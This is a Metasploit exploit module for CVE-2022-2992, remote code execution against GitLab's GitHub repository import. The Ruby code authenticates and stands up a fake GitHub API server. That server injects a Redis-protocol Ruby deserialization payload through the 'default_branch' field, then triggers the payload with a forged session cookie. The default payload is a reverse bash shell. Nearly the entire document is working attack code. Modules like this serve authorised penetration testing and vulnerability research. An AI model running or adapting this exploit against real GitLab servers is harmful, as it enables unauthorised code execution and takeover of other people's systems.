GitLab GitHub Repo Import Deserialization Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
prepend Msf::Exploit::Remote::AutoCheck  
  
include Msf::Exploit::Git::SmartHttp  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HttpServer  
include Msf::Exploit::Remote::HTTP::Gitlab  
include Msf::Exploit::RubyDeserialization  
  
attr_accessor :cookie  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'GitLab GitHub Repo Import Deserialization RCE',  
'Description' => %q{  
An authenticated user can import a repository from GitHub into GitLab.  
If a user attempts to import a repo from an attacker-controlled server,  
the server will reply with a Redis serialization protocol object in the nested  
`default_branch`. GitLab will cache this object and  
then deserialize it when trying to load a user session, resulting in RCE.  
},  
'Author' => [  
'William Bowling (vakzz)', # discovery  
'Heyder Andrade <https://infosec.exchange/@heyder>', # msf module  
'RedWay Security <https://infosec.exchange/@redway>', # PoC  
],  
'References' => [  
['URL', 'https://hackerone.com/reports/1679624'],  
['URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992'], # PoC  
['URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/371884'],  
['CVE', '2022-2992']  
],  
'DisclosureDate' => '2022-10-06',  
'License' => MSF_LICENSE,  
'Platform' => ['unix', 'linux'],  
'Arch' => [ARCH_CMD],  
'Privileged' => false,  
'Stance' => Msf::Exploit::Stance::Aggressive,  
'Targets' => [  
[  
'Unix Command',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :unix_cmd,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_bash'  
}  
}  
]  
],  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
)  
  
register_options(  
[  
OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),  
OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),  
OptInt.new('IMPORT_DELAY', [true, 'Time to wait from the import task before try to trigger the payload', 5]),  
OptAddress.new('URIHOST', [false, 'Host to use in GitHub import URL'])  
]  
)  
deregister_options('GIT_URI')  
end  
  
def group_name  
@group_name ||= Rex::Text.rand_text_alpha(8..12)  
end  
  
def api_token  
@api_token ||= gitlab_create_personal_access_token  
end  
  
def session_id  
@session_id ||= Rex::Text.rand_text_hex(32)  
end  
  
def redis_payload(cmd)  
serialized_payload = generate_ruby_deserialization_for_command(cmd, :net_writeadapter)  
gitlab_session_id = "session:gitlab:#{session_id}"  
# A RESP array of 3 elements (https://redis.io/docs/reference/protocol-spec/)  
# The command set  
# The gitlab session to load the payload from  
# The Payload itself. A Ruby serialized command  
"*3\r\n$3\r\nset\r\n$#{gitlab_session_id.size}\r\n#{gitlab_session_id}\r\n$#{serialized_payload.size}\r\n#{serialized_payload}"  
end  
  
def check  
self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie  
  
vprint_status('Trying to get the GitLab version')  
  
version = Rex::Version.new(gitlab_version)  
  
return CheckCode::Safe("Detected GitLab version #{version} which is not vulnerable") unless (  
version.between?(Rex::Version.new('11.10'), Rex::Version.new('15.1.6')) ||  
version.between?(Rex::Version.new('15.2'), Rex::Version.new('15.2.4')) ||  
version.between?(Rex::Version.new('15.3'), Rex::Version.new('15.3.2'))  
)  
  
report_vuln(  
host: rhost,  
name: name,  
refs: references,  
info: [version]  
)  
return CheckCode::Appears("Detected GitLab version #{version} which is vulnerable.")  
rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError  
return CheckCode::Detected('Could not detect the version because authentication failed.')  
rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e  
return CheckCode::Unknown("#{e.class} - #{e.message}")  
end  
  
def cleanup  
super  
return unless @import_id  
  
gitlab_delete_group(@group_id, api_token)  
gitlab_revoke_personal_access_token(api_token)  
gitlab_sign_out  
rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e  
print_error("#{e.class} - #{e.message}")  
end  
  
def exploit  
if Rex::Socket.is_internal?(srvhost_addr)  
print_warning("#{srvhost_addr} is an internal address and will not work unless the target GitLab instance is using a non-default configuration.")  
end  
  
setup_repo_structure  
start_service({  
'Uri' => {  
'Proc' => proc do |cli, req|  
on_request_uri(cli, req)  
end,  
'Path' => '/'  
}  
})  
execute_command(payload.encoded)  
rescue Timeout::Error => e  
fail_with(Failure::TimeoutExpired, e.message)  
end  
  
def execute_command(cmd, _opts = {})  
vprint_status("Executing command: #{cmd}")  
# due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set  
self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie  
vprint_status("Session ID: #{session_id}")  
vprint_status("Creating group #{group_name}")  
# We need group id for the cleanup method  
@group_id = gitlab_create_group(group_name, api_token)['id']  
fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id  
@redis_payload = redis_payload(cmd)  
# import a repository from GitHub  
vprint_status('Importing a repository from GitHub')  
@import_id = gitlab_import_github_repo(  
group_name: group_name,  
github_hostname: get_uri,  
api_token: api_token  
)['id']  
  
fail_with(Failure::UnexpectedReply, 'Failed to import a repository from GitHub') unless @import_id  
# wait for the import tasks to finish  
select(nil, nil, nil, datastore['IMPORT_DELAY'])  
# execute the payload  
send_request_cgi({  
'uri' => normalize_uri(target_uri.path, group_name),  
'method' => 'GET',  
'keep_cookies' => false,  
'cookie' => "_gitlab_session=#{session_id}"  
})  
rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e  
fail_with(Failure::Unknown, "#{e.class} - #{e.message}")  
end  
  
def setup_repo_structure  
blob_object_fname = "#{Rex::Text.rand_text_alpha(5..10)}.txt"  
blob_data = Rex::Text.rand_text_alpha(5..12)  
blob_object = Msf::Exploit::Git::GitObject.build_blob_object(blob_data)  
  
tree_data =  
{  
mode: '100644',  
file_name: blob_object_fname,  
sha1: blob_object.sha1  
}  
tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_data)  
  
commit_obj = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: tree_object.sha1)  
  
git_objs = [ commit_obj, tree_object, blob_object ]  
  
@refs =  
{  
'HEAD' => 'refs/heads/main',  
'refs/heads/main' => commit_obj.sha1  
}  
@packfile = Msf::Exploit::Git::Packfile.new('2', git_objs)  
end  
  
# Handle incoming requests from GitLab server  
def on_request_uri(cli, req)  
super  
headers = { 'Content-Type' => 'application/json' }  
data = {}.to_json  
case req.uri  
when %r{/api/v3/rate_limit}  
headers.merge!({  
'X-RateLimit-Limit' => '100000',  
'X-RateLimit-Remaining' => '100000'  
})  
when %r{/api/v3/repositories/(\w{1,20})}  
id = Regexp.last_match(1)  
name = Rex::Text.rand_text_alpha(8..12)  
data = {  
id: id,  
name: name,  
full_name: "#{name}/name",  
clone_url: "#{get_uri.gsub(%r{/+$}, '')}/#{name}/public.git"  
}.to_json  
when %r{/\w+/public.git/info/refs}  
data = build_pkt_line_advertise(@refs)  
headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-advertisement' })  
when %r{/\w+/public.git/git-upload-pack}  
data = build_pkt_line_sideband(@packfile)  
headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' })  
when %r{/api/v3/repos/\w+/\w+}  
bytes_size = rand(3..8)  
data = {  
'default_branch' => {  
'to_s' => {  
'bytesize' => bytes_size,  
'to_s' => "+#{Rex::Text.rand_text_alpha_lower(bytes_size)}\r\n#{@redis_payload}"  
# using a simple string format for RESP  
}  
}  
}.to_json  
end  
send_response(cli, data, headers)  
end  
end  
`